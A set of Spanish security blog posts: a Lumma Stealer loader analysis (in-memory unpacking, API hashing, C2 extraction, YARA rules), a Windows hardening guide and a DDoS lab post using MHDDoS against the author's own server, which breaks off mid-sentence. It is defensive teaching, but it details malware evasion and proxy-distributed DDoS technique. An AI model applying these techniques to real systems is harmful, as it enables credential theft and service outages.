$ file * Solara.exe.bin: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows Yanto.exe.bin: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows $ diec --heuristicscan * Solara.exe: PE32 Linker: Microsoft Linker Library: .NET Framework(v4.7.2, CLR v4.0.30319) (Heur)Packer: Compressed or packed data Yanto.exe: PE32 Linker: Microsoft Linker Library: .NET Framework(v4.7.2, CLR v4.0.30319) (Heur)Packer: Compressed or packed data ``` Tenemos un par de aplicaciones .NET y para analizar este tipo de aplicaciones tenemos DnSpy. Abrimos cualquiera de ellos (siguiente ejemplo Solara.exe) y buscamos signos de ofuscación ya que como os podéis imaginar, Lumma Stealer no estará directamente accesible, sino que lo extraerá o descargará, pronto lo comprobaremos. [Imagen: DnSpy Lumma] El EntryPoint parece estar sin ofuscar, no vemos nada raro, así que pulsamos sobre el mismo y apareceremos en el Main. [Imagen: Entrada sin ofuscar lumma] A modo de resumen, este código inspecciona el propio archivo ejecutable en busca de una sección específica en su encabezado PE (una sección con el nombre o formato relacionado con "CS"). Si encuentra la sección, extrae su contenido y lo almacena en un arreglo de bytes. Al final, si se cumple esta condición, crea un objeto de la clase Publisher. Abrimos el fichero con Radare2 y mostramos las secciones: [Imagen: Radare2 Lumma] Tenemos una coincidencia y comprobamos qué tipo de datos hay en esa sección. [Imagen: Datos en Sección] Entramos dentro de la clase Publisher para ver qué va a hacer con los datos anteriores. [Imagen: Clase Publisher Lumma] Por lo tanto, la clase Publisher esta diseñada para manipular y ejecutar código desde la memoria: - Aplica cambios de permisos en regiones de memoria utilizando la API VirtualProtect para permitir que se ejecute código que ha sido cargado o descifrado en la memoria. - Utiliza claves almacenadas en el código para operar sobre los datos en memoria. - Ejecución de código dinámico: Utiliza CallWindowProcA, que indica que está ejecutando código dinámico desde el contenido de memoria que ha modificado previamente. Si nos fijamos en el código de la captura y prestamos atención al bucle, tenemos que llama dos veces al método Program.ApplySettings: - La primera vez, pasa como parámetros los datos almacenados en Program.inputData, su longitud, y una clave (Program.dataKey). - La segunda vez, pasa como parámetros el contenido de la sección (Program.sectionContent), su longitud, y una clave (Publisher._key), que es un array de bytes definido en la clase. Los datos utilizados para descifrar el contenido de “algo” estaba justo debajo del EntryPoint, serían estos: [Imagen: Datos descifrar clase publisher Lumma Stealer] Ponemos unos breakpoint en las líneas siguientes y vamos viendo como se van completando las variables con los datos que finalmente nos serán de utilidad, así vemos qué hace con esa sección que vimos antes: [Imagen: BreakPoint Lumma] Después del último breakpoint tenemos en la variable array el propio ejecutable. [Imagen: Variable Array] En la siguiente captura vemos la zona de código utilizada para poner todo en su sitio, es decir, Lumma Stealer en memoria. [Imagen: Puesta en memoria] Estas dos últimas funciones cargan dinámicamente la API VirtualProtect desde la biblioteca kernel32.dll utilizando LoadLibraryA y GetProcAddress, para cambiar los permisos de protección de la región de memoria de Program.inputData, permitiendo leer, escribir y ejecutar (PAGE_EXECUTE_READWRITE). Luego, CallWindowProcAejecuta código desde una posición específica dentro de Program.inputData (índice 392), utilizando también el contenido de Program.sectionContent como uno de los parámetros, lo que ejecutaría código almacenado o modificado en memoria. [Imagen: Cambio permisos de protección] Vamos a ver el otro ejecutable que tenemos, Yanto.exe, y comprobamos que es muy parecido. [Imagen: Yanto.exe Lumma Stealer] Esta vez la clase se llama diferente pero hace más o menos lo mismo. [Imagen: Simil con clase Publisher y Router de Yanto] El cual, como vemos en la imagen anterior, realizaría las mismas acciones con VirtualProtect y CallWindowProcA que había mostrado con el otro malware. El método InitRoute realiza una serie de operaciones relacionadas con la manipulación y ejecución de código en memoria. Primero, llama a Program.BeginInit para procesar el contenido de la sección (Program.sectionContent) utilizando una clave almacenada en Router._key. Luego, cambia los permisos de la región de memoria que contiene Program.inputData a PAGE_EXECUTE_READWRITE mediante Program.VirtualProtect, permitiendo su ejecución. Después, vuelve a inicializar los datos de entrada (Program.inputData) con una clave (Program.dataKey). Finalmente, ejecuta código desde la memoria, llamando a Program.CallWindowProcA con una referencia a una posición específica dentro de Program.inputData y utilizando Program.sectionContent como parámetro. Lo que vuelve a indicar que se está ejecutando código modificado o cargado dinámicamente en memoria. Es muy parecido al de antes e incluso tiene las mismas variables (muy útil para lo que veremos al final): [Imagen: Deco Lumma Stealer Yanto] Ponemos un breakpoint directamente en la siguiente línea y esperamos a que se cargue en memoria. [Imagen: Breake Stealer Ejecucción] Y lo extraemos como en el caso anterior: [Imagen: Extracción similar] Si depuramos cualquiera de las muestras extraídas llegamos al punto de las obtención de API que serán empleadas durante la comunicación y son generadas en tiempo de ejecución, se usa API Hashing con el algoritmo MurmurHash2: [Imagen: MurmurHash2] Con esto ocultan la finalidad real del binario, las funciones no se encuentran disponibles ni en las imports (en la IAT) ni como strings. Buscamos la zona del código en donde se obtienen los dominios utilizados por el malware, esto lo iréis viendo a medida que vayáis avanzando en el malware. [Imagen: Avances Malware] Como queremos loguear los C2, editamos el breakpoint en ese punto, en donde nos devuelve el C2 en el registro ESI: [Imagen: Logueo C2 Lumma] Y en la pestaña de Log aparecerán los C2 de Lumma, serían todos estos. [Imagen: C2 Lumma] Esta herramienta es capaz de sacar los C2 de forma estática, pero no funciona con estas versiones, serán versiones recientes. [Imagen: Lumma Extractor] Siempre me gusta terminar con una Yara para detectar lo que hemos visto así que ahí va: ``` rule Lumma_payload { meta: author = "byRafa" description = "Detects Lumma Stealer payload" cape_type = "Lumma Payload" strings: $MZ = "MZx" $s1 = ",5054585<5@5D5H5L5P5T5X5\\5`5d5h5l5p5t5x5|5" $s2 = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F" condition: ($MZ at 0 and all of ($s*)) } rule Lumma_packer { meta: author = "byRafa" description = "Detects Lumma Stealer packer" cape_type = "Lumma Payload" strings: $s1 = "AD446C34F2704865A9E424BE5755BC8F9140414FD7E1456F1A4581F8C2D778A0" $s2 = "CallWindowProcA" $s3 = "_CorExeMain" $s4 = "get_ExecutablePath" $s5 = "inputData" $s6 = "_key" $s7 = "dataKey" $s8 = "TargetFrameworkAttribute" $s9 = "FromBase64String" $s10 = "DebuggingModes" condition: (uint16(0) == 0x5A4D and all of ($s*)) } ``` Comprobamos que funciona: ``` $ yara Lumma.yar . Lumma_packer ./Yanto.exe Lumma_payload ./Yanto_dumped.exe Lumma_packer ./Solara.exe Lumma_payload ./Solara_dumped.exe ``` Espero que os haya gustado y nos vemos en el siguiente POST!! --- # Guía definitiva para blindar tu PC Windows sin arruinarte URL: https://ciberseguridad.blog/guia-definitiva-para-blindar-tu-pc-windows-sin-arruinarte/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2025-02-08 Actualizado: 2026-10-04 > Convierte tu PC en una fortaleza digital sin necesidad de hipotecar tu casa. Máxima seguridad, sin coste. Hoy nos sumergiremos en las profundidades de la ciberseguridad "like a user" para Windows, con un objetivo claro: convertir nuestro PC en una fortaleza digital sin necesidad de hipotecar tu casa. ¿Estás listo para transformar tu equipo en un bastión inexpugnable contra las amenazas cibernéticas? Pues abróchate el cinturón, porque vamos a emprender un viaje fascinante por el mundo de la ciberseguridad a bajo coste y alta eficacia. ## El panorama actual de las ciberamenazas Antes de sumergirnos en las soluciones, es crucial entender el campo de batalla digital en el que nos movemos. En 2025, las ciberamenazas han evolucionado a un ritmo vertiginoso. Los ciberdelincuentes ya no son simples aficionados en busca de emociones, si no que ahora nos enfrentamos a organizaciones sofisticadas que utilizan inteligencia artificial y técnicas de ingeniería social avanzadas para comprometer nuestros sistemas. Según los últimos informes de ciberseguridad, los ataques de ransomware siguen siendo una de las principales amenazas, con un aumento del 150% en los últimos dos años. Los ataques de phishing se han vuelto tan elaborados que incluso los expertos en tecnología caen en sus trampas. Y no olvidemos las vulnerabilidades zero day, que dejan expuestos incluso a los sistemas más actualizados. Pero no te desanimes. Aunque el panorama pueda parecer sombrío, existen numerosas formas de protegerse sin necesidad de invertir en costosos sistemas de ciberseguridad . En este artículo, os guiarémos paso a paso para convertir tu PC Windows en un búnker digital, utilizando principalmente herramientas gratuitas o de bajo coste, tu sólo céntrate en comprarte un pepino de portátil , nosotros eficiencias costes de ciberseguridad, sin ponerte en riesgo. ## 1. Actualizaciones y configuración básica ### 1.1 Mantén tu sistema al día La primera línea de defensa, y quizás la más importante, es mantener vuestro sistema operativo y todas tus aplicaciones actualizadas. Windows 10 y 11 tienen la capacidad de actualizarse automáticamente, pero es crucial asegurarse de que esta función esté activada y funcionando correctamente. Para verificar y ajustar la configuración de actualizaciones: 1. Ve a Configuración > Actualización y seguridad > Windows Update 2. Haz clic en "Opciones avanzadas" 3. Asegúrate de que "Recibir actualizaciones para otros productos de Microsoft cuando actualice Windows" esté activado Además, configura un horario para las actualizaciones que no interrumpa tu trabajo diario. Por ejemplo, puedes programarlas para que se instalen durante la noche. [Imagen: Windows Update] ### 1.2 Configura correctamente el Control de cuentas de usuario (UAC) El UAC es una característica de seguridad que evita cambios no autorizados en tu sistema. Muchos usuarios lo desactivan por comodidad, pero esto es un error grave. Para configurar el UAC: 1. Busca "Control de cuentas de usuario" en el menú Inicio 2. Ajusta el nivel de notificación. Recomiendo mantenerlo en el segundo nivel más alto: "Notificarme solo cuando las aplicaciones intenten realizar cambios en mi equipo" ### 1.3 Activa el Firewall de Windows El Firewall de Windows es una herramienta poderosa y gratuita que muchos subestiman. Asegúrate de que esté activado: 1. Ve a Panel de control > Sistema y seguridad > Firewall de Windows Defender 2. Verifica que el firewall esté activado para redes privadas y públicas [Imagen: Centro de seguridad de Windows Defender con la sección Firewall y protección de red señalada] ### 1.4 Habilita la encriptación de disco con BitLocker Si tu versión de Windows lo permite, activa BitLocker para encriptar tu disco duro. Esto protegerá tus datos en caso de robo físico del dispositivo. 1. Ve a Panel de control > Sistema y seguridad > Cifrado de unidad BitLocker 2. Selecciona la unidad que deseas encriptar y sigue las instrucciones Si no tienes acceso a BitLocker, considera usar VeraCrypt, una alternativa gratuita y de código abierto. ## 2. Seguridad en la navegación web ### 2.1 Elige y configura tu navegador Aunque el debate sobre qué navegador es más seguro sigue abierto, lo importante es configurar correctamente el que elijas. Para este ejemplo, usaremos Google Chrome, pero los principios son aplicables a otros navegadores ( al gusto de cada uno ) 1. Mantén Chrome actualizado 2. Ve a Configuración > Privacidad y seguridad 3. Activa "Enviar una solicitud de "No rastrear" con tu tráfico de navegación" 4. En "Cookies y otros datos del sitio", selecciona "Bloquear cookies de terceros" ### 2.2 Extensiones de seguridad esenciales Algunas extensiones gratuitas pueden mejorar significativamente tu seguridad en línea: - uBlock Origin: Bloqueador de anuncios y rastreadores ( Aunque google se la quiere cargar ) - HTTPS Everywhere: Fuerza conexiones HTTPS cuando estén disponibles - Privacy Badger: Bloquea rastreadores de forma inteligente [Imagen: uBlock Origin extension] ### 2.3 Utiliza un administrador de contraseñas Un administrador de contraseñas es esencial para mantener contraseñas únicas y fuertes para cada servicio. Bitwarden es una excelente opción gratuita y de código abierto. 1. Descarga e instala Bitwarden 2. Crea una contraseña maestra fuerte 3. Comienza a guardar tus contraseñas y utiliza el generador de contraseñas integrado para crear nuevas contraseñas seguras Desaconséjo utilizar gestores como los usados en chrome o similar, ya que será donde primero intenten buscar nuestros stealers ### 2.4 Implementa la autenticación de dos factores (2FA) Siempre que sea posible, activa la 2FA en tus cuentas en línea. Puedes usar aplicaciones gratuitas como Google Authenticator o Authy para generar códigos de 2FA. ## 3. Protección contra malware y virus ### 3.1 Windows Defender: Tu primera línea de defensa Contrariamente a la creencia popular, Windows Defender se ha convertido en un antivirus robusto y eficaz. Para asegurarte de que esté funcionando correctamente: 1. Ve a Configuración > Actualización y seguridad > Seguridad de Windows 2. Haz clic en "Abrir Seguridad de Windows" 3. Verifica que todas las protecciones estén activadas ### 3.2 Complementa con otros fabricantes Aunque Windows Defender es una excelente base, tener una segunda opinión puede ser crucial para detectar amenazas que podrían pasar desapercibidas. Os dejamos una lista de opciones gratuitas para considerar: 1. Malwarebytes Free: Conocido por su eficacia en la detección y eliminación de malware. 2. Bitdefender Antivirus Free Edition: Ofrece protección en tiempo real sin ralentizar el sistema. 3. Avast Free Antivirus: Incluye un escudo web y análisis de software. 4. AVG AntiVirus Free: Proporciona protección contra virus, spyware y otros malware. 5. Kaspersky Security Cloud Free: Ofrece protección básica con algunas características avanzadas. 6. Sophos Home Free: Incluye protección en tiempo real y control parental. Este es mi opción preferida gratuita , sobre todo , por el control parental el cual se gestiona desde cloud. Una muy buena opción familiar. 7. Avira Free Security: Combina antivirus con VPN limitada y otras herramientas. 8. Comodo Antivirus: Conocido por su modo de contención para ejecutar aplicaciones sospechosas de forma segura. Recomendaciones para usar antimalware complementario: 1. Elige uno de los programas mencionados y descárgalo de su sitio web oficial. 2. Instálalo y realiza un escaneo completo al menos una vez a la semana. 3. No ejecutes múltiples antivirus en tiempo real simultáneamente, ya que pueden entrar en conflicto. ( Instala solo uno ) 4. Considera alternar entre diferentes soluciones cada pocos meses para obtener diferentes perspectivas de seguridad. ( Esto ya es muy friki ... pero aquí os lo dejo ) Es importante indicar que estas versiones gratuitas suelen tener limitaciones en comparación con sus contrapartes de pago. Sin embargo, cuando las usamos en conjunto con buenas prácticas de ciberseguridad y Windows Defender, proporcionan una capa adicional de protección valiosa sin costo adicional ### 3.3 Configura escaneos programados Programa escaneos regulares con Windows Defender: 1. Abre Seguridad de Windows 2. Ve a Protección contra virus y amenazas > Configuración de análisis 3. Configura un escaneo completo semanal ### 3.4 Mantén tus aplicaciones actualizadas Muchas vulnerabilidades se explotan a través de software desactualizado. Usa Patch My PC Updater (gratuito) para mantener tus aplicaciones al día automáticamente. ## 4. Seguridad de la red ### 4.1 Configura tu router correctamente La seguridad de tu red doméstica comienza en tu router: 1. Cambia la contraseña predeterminada de administración 2. Usa WPA3 si está disponible, o WPA2 como mínimo 3. Desactiva WPS (Wi-Fi Protected Setup) 4. Actualiza el firmware del router regularmente Tengo echado el ojo a un router en PcComponentes , que me fascina ( FRITZ!Box 4060 ). Un día, cuando lo adquiera, hacemos el bastionado perfecto de ciberseguridad , que viene a colación del siguiente punto. ### 4.2 Utiliza una VPN Una VPN puede proteger tu tráfico en redes públicas. Aunque las mejores VPN son de pago, existen opciones gratuitas como ProtonVPN que ofrecen protección básica. ### 4.3 Configura un DNS seguro Cambia tu DNS a una opción más segura y privada. Hicimos un artículo sobre DNS super amplio y que os recomiendo que echéis un ojo : 1. Ve a Panel de control > Redes e Internet > Centro de redes y recursos compartidos 2. Haz clic en tu conexión > Propiedades > Protocolo de Internet versión 4 (TCP/IPv4) > Propiedades 3. Selecciona "Usar las siguientes direcciones de servidor DNS" y configura:DNS primario: 1.1.1.1 (Cloudflare)DNS secundario: 1.0.0.1 (Cloudflare) ## 5. Protección de datos y privacidad ### 5.1 Realiza copias de seguridad regulares Las copias de seguridad son tu última línea de defensa contra el ransomware y la pérdida de datos: 1. Utiliza la Historial de archivos de Windows para copias de seguridad automáticas 2. Complementa con copias de seguridad externas usando herramientas gratuitas como FreeFileSync [Vídeo: Crear COPIAS de SEGURIDAD GRATIS y AUTOMÁTICAS en FreeFileSync y RealTimeSync [Tutorial ESPAÑOL]](https://www.youtube.com/watch?v=Edv-5YlsLsc) ### 5.2 Configura la privacidad de Windows Windows 10 y 11 recopilan bastantes datos por defecto. Ajusta la configuración de privacidad: 1. Ve a Configuración > Privacidad 2. Revisa y ajusta cada sección según tus preferencias, prestando especial atención a "Diagnósticos y comentarios" ### 5.3 Usa un gestor de permisos de aplicaciones Windows 10 y 11 permiten controlar qué aplicaciones tienen acceso a tu cámara, micrófono, ubicación, etc. Revisa estos permisos regularmente: 1. Ve a Configuración > Privacidad 2. Revisa cada categoría (Cámara, Micrófono, Ubicación, etc.) y ajusta los permisos según sea necesario ## 6. Educación y concienciación en seguridad ### 6.1 Mantente informado Suscríbete a blogs y boletines de seguridad para mantenerte al día sobre las últimas amenazas y mejores prácticas. Ya estas tardando en suscribirte a nuestro blog ;) ## 7. Herramientas adicionales de bajo coste ### 7.1 Sandboxie Sandboxie te permite ejecutar aplicaciones en un entorno aislado, protegiendo tu sistema de posibles amenazas. La versión básica es gratuita. [Vídeo: Ejecuta programas de forma segura con Sandboxie | Windows](https://www.youtube.com/watch?v=LFy-Km2en70) ### 7.2 Process Explorer Esta herramienta gratuita de Microsoft te permite ver qué procesos están ejecutándose en tu sistema, ayudándote a identificar actividades sospechosas. [Imagen: Processor Explorer] ### 7.3 Autoruns Otra herramienta gratuita de Microsoft que muestra qué programas están configurados para ejecutarse durante el inicio del sistema o el inicio de sesión. ## 8. Configuraciones avanzadas para usuarios experimentados ### 8.1 Habilita Controlled Folder Access Esta característica de Windows Defender puede prevenir el ransomware: 1. Ve a Seguridad de Windows > Protección contra virus y amenazas > Administrar la configuración 2. Activa "Acceso controlado a carpetas" ### 8.2 Configura políticas de grupo Si tienes Windows 10 Pro o superior, puedes usar el Editor de políticas de grupo para configuraciones avanzadas: 1. Presiona Win + R, escribe "gpedit.msc" y presiona Enter 2. Navega por las políticas y ajústalas según tus necesidades de seguridad ### 8.3 Usa AppLocker AppLocker te permite controlar qué aplicaciones pueden ejecutarse en tu sistema: 1. Abre el Editor de políticas de grupo local 2. Navega a Configuración del equipo > Políticas > Configuración de Windows > Configuración de seguridad > Políticas de control de aplicaciones > AppLocker ## La seguridad es un viaje, no un destino Implementar todas estas medidas puede parecer abrumador al principio, pero recuerda que la ciberseguridad es un proceso continuo. No es necesario hacerlo todo de una vez, comienza con los fundamentos y ve avanzando gradualmente. La clave para mantener tu sistema seguro a largo plazo es desarrollar buenos hábitos: 1. Mantén todo actualizado 2. Sé cauteloso con los correos electrónicos y los enlaces 3. Usa contraseñas fuertes y únicas 4. Realiza copias de seguridad regularmente 5. Mantente informado sobre las últimas amenazas y mejores prácticas Recuerda, la ciberseguridad perfecta no existe, pero siguiendo estas pautas, habrás hecho tu sistema significativamente más seguro sin gastar una fortuna. Nos hemos centrado en que la mayoría de las herramientas y técnicas mencionadas fuesen gratuitas, pero estamos seguros , que realizando estos hábitos , el nivel de protección de vuestros equipos y vuestro ecosistema domestico , será mucho mejor. --- # La evolución de los ataques DDOS y por qué debes estar preocupado este 2025 URL: https://ciberseguridad.blog/la-evolucion-de-los-ataques-ddos-y-por-que-debes-estar-preocupado-este-2025/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2025-01-02 Actualizado: 2026-10-05 Tema: Operaciones de Seguridad > Conoce la evolución de ataques DDoS: De capas 3-4 a 7. Aprende a unificar defensas y enfrentar nuevas amenazas en 2025 Sé que hace tiempo que no publico nada en el blog, pero no quería terminar el año sin dejaros algo que os inspire y os sirva de cara a 2025. Hoy, en este último día del año, no sé si lograré terminar este post, porque llevo trabajándolo varios días y todavía tiene cosas por pulir. Sin embargo, quería aprovechar para compartirlo, aunque sea en parte, como un pequeño regalo para cerrar este 2024 y abrir las puertas a un nuevo año lleno de retos y aprendizajes. Estos últimos meses he estado algo desconectado, necesitaba un respiro. Algunos motivos personales me han llevado a pausar mi actividad en el blog, pero creo que también era necesario para volver con energía renovada. Para este 2025, quiero retomar el ritmo poco a poco, pero con una propuesta clara: contenidos trabajados, originales y útiles. Mi idea es que estos posts sirvan como un laboratorio, una ventana a experiencias reales, con información práctica que podamos aplicar en nuestro día a día en el mundo de la ciberseguridad. Me comprometo a traeros contenido de calidad, hecho con cariño y dedicación. Esa será mi intención y mi propósito para el próximo año. Dicho esto, os dejo con este post que he estado desarrollando, y que espero os aporte valor y sea una fuente de inspiración para arrancar el año con fuerza. ¡Gracias por seguir ahí y feliz 2025! ## 2025 , el año en que deberemos evolucionar nuestros sistemas DDOS A lo largo de 2024, hemos presenciado una evolución significativa en los ataques de denegación de servicio (DDoS), tal y como se refleja en informes recientes como los publicados por Cloudflare y otros líderes en la industria. Tradicionalmente, estos ataques eran mayormente volumétricos y se centraban en las capas 3 y 4 del modelo OSI, saturando la infraestructura de red y colapsando servicios. Sin embargo, en los últimos meses hemos observado un cambio hacia estrategias más sofisticadas que incluyen ataques a la capa 7, la capa de aplicación. Este cambio ha puesto en evidencia las limitaciones de los sistemas tradicionales de mitigación de DDoS. Aunque siguen siendo efectivos para manejar los ataques en las capas 3-4, no están diseñados para enfrentar combinaciones de ataques que incluyen la capa 7 ( Por norma general ). Lo que ocurre en la práctica es que los atacantes lanzan una primera oleada en las capas inferiores, forzando a los sistemas de defensa a centrarse en mitigar esas capas, mientras simultáneamente dirigen ataques a la capa 7. Esta táctica logra sobrecargar sistemas como WAFs (Firewalls de Aplicaciones Web) o soluciones on-premise como el módulo ASM de F5 entre otros muchos, incluso provocando la saturación de firewalls perimetrales y otros componentes críticos de la infraestructura. Para hacer frente a este panorama, necesitamos replantear nuestras estrategias de mitigación. No solo se trata de protegernos contra ataques volumétricos, sino también de gestionar eficazmente el tráfico malicioso en las capas superiores. Esto requerirá un enfoque integral que combine la defensa en capas (3, 4 y 7) y el uso coordinado de diferentes ISPs para distribuir y absorber el impacto. Lo más preocupante es que, con los recursos actuales, incluso un atacante con capacidades limitadas puede lanzar ataques potentes. Por ejemplo, con un servidor modesto o una conexión de ancho de banda doméstico, es posible generar ataques de hasta 1 Gbps que podrían comprometer infraestructuras mal preparadas, incluyendo sitios web o VPNs. Por ello, considero que la evolución en la defensa contra ataques de denegación de servicio será una de las tendencias clave para 2025. No podemos seguir dependiendo únicamente de las soluciones tradicionales, es necesario adaptarnos y mejorar nuestras estrategias de mitigación, haciendo énfasis en las capas de aplicación y en soluciones más dinámicas y escalables. En este post, exploraremos cómo han cambiado estos ataques, cómo funcionan en detalle y qué herramientas o estrategias podemos implementar para estar mejor preparados. Además, desarrollaremos un pequeño laboratorio para ilustrar estos conceptos de manera práctica. Quiero recalcar que este post tiene un propósito meramente educativo. Aunque discutiremos ciertos aspectos técnicos, evitaré proporcionar detalles que puedan ser utilizados de forma malintencionada. El objetivo es entender por qué los ataques DoS están cambiando y qué pasos debemos tomar para protegernos de manera eficaz. La seguridad es una responsabilidad compartida, y aprender a defendernos es el primer paso para garantizar un entorno digital más seguro para todos. ## "El Laboratorio" DDOS En este laboratorio, he configurado dos máquinas virtuales independientes para analizar la dinámica de los ataques de denegación de servicio (DDoS) en capas 3, 4 y 7, con el objetivo de comprender cómo evolucionan estos ataques y cómo podemos enfrentarlos con mejores estrategias. Ambas máquinas están desplegadas en un hosting propio, sin ninguna arquitectura compleja, para mantener el entorno sencillo y enfocado en los objetivos específicos del experimento. [Imagen: Laboratorio DDOS - Hosting] NOTA: Esta imagen refleja mi "amor" por lo que hago ;) . Ya que este tipo de post , me cuestan hasta dinero. Por eso , y aunque tristemente me duela, necesito poner algo de publicidad para cubrir estos gastos o al menos , parte de ellos. En la primera máquina, he instalado MHDDoS, una herramienta poderosa y versátil para realizar ataques DoS y DDoS. Esta herramienta, desarrollada en Python, destaca por ofrecer hasta 56 métodos diferentes de ataque, cubriendo tanto las capas de red (3 y 4) como la capa de aplicación (7). Su simplicidad y capacidad para ejecutar ataques distribuidos la han convertido en una opción ampliamente utilizada en conflictos cibernéticos recientes, como la ciberguerrilla ucraniana y operaciones rusas. MHDDoS permite configurar ataques volumétricos masivos, como TCP Flood o UDP Flood, y también ataques más sofisticados dirigidos a aplicaciones web, como HTTP GET Flood y otros muchos mas complejos . En este laboratorio, lo que más me interesaba era su capacidad para simular ataques multicapas y observar cómo afectan a un sistema objetivo con recursos limitados, algo que en la realidad puede ser devastador si no se está preparado. ( Muchos de vosotros ya lo estáis sufriendo ) [Imagen: Maquina MHDDOS] La segunda máquina se ha configurado para monitorizar el impacto de estos ataques en tiempo real. Aquí he utilizado NetData, una herramienta ligera pero increíblemente completa que permite visualizar métricas clave como el uso de CPU, memoria, tráfico de red y la carga general del sistema ( Y que dispone de 14 días de trail ). Esta máquina también alberga un servidor web básico Nginx, que sirve como objetivo de los ataques. Con NetData, pude observar cómo los ataques generan picos en el rendimiento de la máquina, afectando tanto al throughput como al tiempo de respuesta de las aplicaciones. Además, usaremos capturas de tráfico generadas con herramientas como tcpdump para analizar los paquetes en detalle, lo que nos permitirá estudiar cómo varía el comportamiento del ataque dependiendo de si se utilizan proxies o no, y las variaciones en ataques. [Imagen: Maquina NetData] [Imagen: Navegador mostrando un servidor web en Docker accesible por la IP 155.138.213.115] Lo interesante de este enfoque es que combina el análisis técnico con una simulación práctica. Por un lado, MHDDoS permite probar métodos de ataque en condiciones controladas, mientras que NetData me ofrece una ventana clara para entender las consecuencias en la infraestructura. Durante las pruebas, quedó claro cómo un atacante con recursos mínimos puede generar un impacto significativo, especialmente cuando combina ataques volumétricos en capas 3 y 4 con estrategias más específicas en la capa 7. Esto refleja la necesidad urgente de evolucionar nuestras estrategias de mitigación. Incluso, como podéis observar en MHDDOS, el numero de métodos de L7 respecto a L4 , es mucho mayor, prácticamente , dejando ancladas en el pasado las soluciones Legacy de L3-4 . El objetivo de este laboratorio no es solo explorar cómo funcionan los ataques, sino también mostrar por qué es crucial adaptar nuestras defensas. Este post es, y lo repito de nuevo, una herramienta educativa para reflexionar sobre la importancia de proteger nuestras infraestructuras frente a una amenaza que está en constante evolución. Como traca final, y para mostrar la importancia de nuestra tesis, intentaremos simular un ataque , lo mas grande que podamos "que no nos cueste mucho" , atacando nuestro propio blog que tenemos protegido con Cloudflare, una de las mejores opciones domesticas que podemos usar. NOTA: Para minimizar posibles malos usos, y aunque esta publicado en su site, obviaremos la parte de instalación y configuración de MHDDOS, centrándonos en los métodos y resultado de los mismos, intentando buscar conclusiones que nos ayuden a mínimizar el impacto de estos ataques. ## De DoS a DDoS con MHDDOS Al trabajar con MHDDoS para lanzar las pruebas en el laboratorio, me encontré con una diferencia clave en la forma en que los ataques se comportan dependiendo de cómo se configuren los proxys. Si no se especificaban correctamente los proxys en los parámetros del ataque, todo el tráfico malicioso salía directamente desde la máquina que ejecutaba MHDDoS, es decir, desde una única IP: la del servidor configurado para el laboratorio ( 155.138.174.242 ) . Esto hacía que el ataque fuera fácilmente rastreable y mucho más sencillo de mitigar, ya que el origen del tráfico estaba centralizado. Sin embargo, al configurar los proxys correctamente, el comportamiento del ataque cambiaba radicalmente: el tráfico ahora parecía provenir de múltiples ubicaciones distribuidas, simulando un ataque DDoS (Distributed Denial of Service). Esta diferencia no solo es técnica, sino que también refleja dos conceptos fundamentales en la ciberseguridad: un ataque DoS y un ataque DDoS. En un ataque DoS (Denial of Service), todo el tráfico malicioso proviene de una única fuente, como en nuestro caso cuando la máquina generadora no utiliza proxys. Esto lo hace más fácil de detectar y bloquear, ya que se pueden aplicar contramedidas, como el filtrado por IP, en los sistemas de defensa del objetivo. Sin embargo, su simplicidad no significa que no sea efectivo. Si el ataque tiene suficiente intensidad, aún puede colapsar los servicios si el objetivo no cuenta con recursos suficientes para manejar la carga. Por otro lado, un ataque DDoS (Distributed Denial of Service), como el que se genera al utilizar proxys en MHDDoS, distribuye el tráfico entre múltiples fuentes, haciendo que parezca que proviene de diversas ubicaciones geográficas. Esto no solo aumenta la escala del ataque, sino que también complica significativamente su mitigación. Al dispersar las solicitudes maliciosas, el objetivo no puede identificar fácilmente una única fuente que bloquear, lo que exige el uso de soluciones más avanzadas, como sistemas de mitigación basados en inteligencia artificial o servicios externos especializados en defensa contra DDoS. Durante las pruebas, estas diferencias fueron claramente visibles. En las capturas de tráfico realizadas, observamos que cuando no se configuraban los proxys, todos los paquetes maliciosos compartían la misma IP origen, lo que hacía que el ataque tuviera un patrón predecible. Por el contrario, al activar los proxys, el tráfico adquiría una distribución mucho más amplia, con múltiples direcciones IP en las cabeceras de origen, simulando una red de bots o una botnet distribuida. Este ejercicio demuestra la importancia de entender cómo operan estas herramientas y sus configuraciones. Aunque el propósito de este laboratorio es puramente educativo, es evidente que, en manos malintencionadas, una configuración adecuada de proxys puede convertir un ataque relativamente sencillo en uno extremadamente difícil de manejar. Estas pruebas también subrayan la relevancia de contar con estrategias de mitigación modernas y adaptativas, capaces de identificar patrones anómalos incluso en ataques distribuidos. ### DoS VS DDoS Durante las primeras pruebas con MHDDoS, configuré un ataque TCP dirigido al puerto 80 de la máquina objetivo, convencido de que estaba utilizando correctamente una lista de proxys. Sin embargo, rápidamente me di cuenta de que no era así. Aunque el ataque parecía ejecutarse de manera funcional, todo el tráfico se originaba desde una única IP, la de nuestro servidor que ejecutaba MHDDoS. Esto sucedió porque la lista de proxys no estaba configurada adecuadamente, un error que destaca la importancia de entender cómo funcionan estos parámetros en herramientas avanzadas como esta. [Imagen: Terminal mostrando el script MHDDoS lanzando un ataque TCP sin proxy al puerto 80] MHDDoS requiere una configuración precisa de los proxys para distribuir el tráfico de forma efectiva. No basta con cargar una lista de proxys cualquiera; es fundamental asegurarse de que la lista sea válida y que el comando para cargarla esté correctamente estructurado. En este caso, el comando que utilicé permitió que el ataque se ejecutara, pero no habilitó la funcionalidad de distribución de proxys. Esto quedó claramente reflejado cuando capturé el tráfico generado por el ataque: todos los paquetes maliciosos tenían como IP de origen la dirección de nuestro servidor de pruebas, indicando que el tráfico no se estaba distribuyendo. [Imagen: Gráfico de flujo de Wireshark con paquetes TCP PSH ACK contra el puerto 80] La captura de tráfico, realizada con herramientas como tcpdump, fue clave para identificar este problema. En la imagen, se puede observar cómo cada paquete del ataque comparte la misma IP de origen. Esto confirma que el ataque se comportó como un DoS convencional, en el que todo el tráfico proviene de una única fuente. Aunque el ataque fue funcional, este patrón lo hacía mucho más sencillo de mitigar, ya que la máquina objetivo podría simplemente bloquear esa IP. Este error inicial me permitió profundizar en cómo MHDDoS maneja los proxys y cómo una configuración incorrecta puede limitar severamente su funcionalidad. Aprendí que no solo es crucial cargar una lista de proxys válida, sino también entender cómo y cuándo se aplican durante la ejecución del ataque. Esta experiencia resalta la 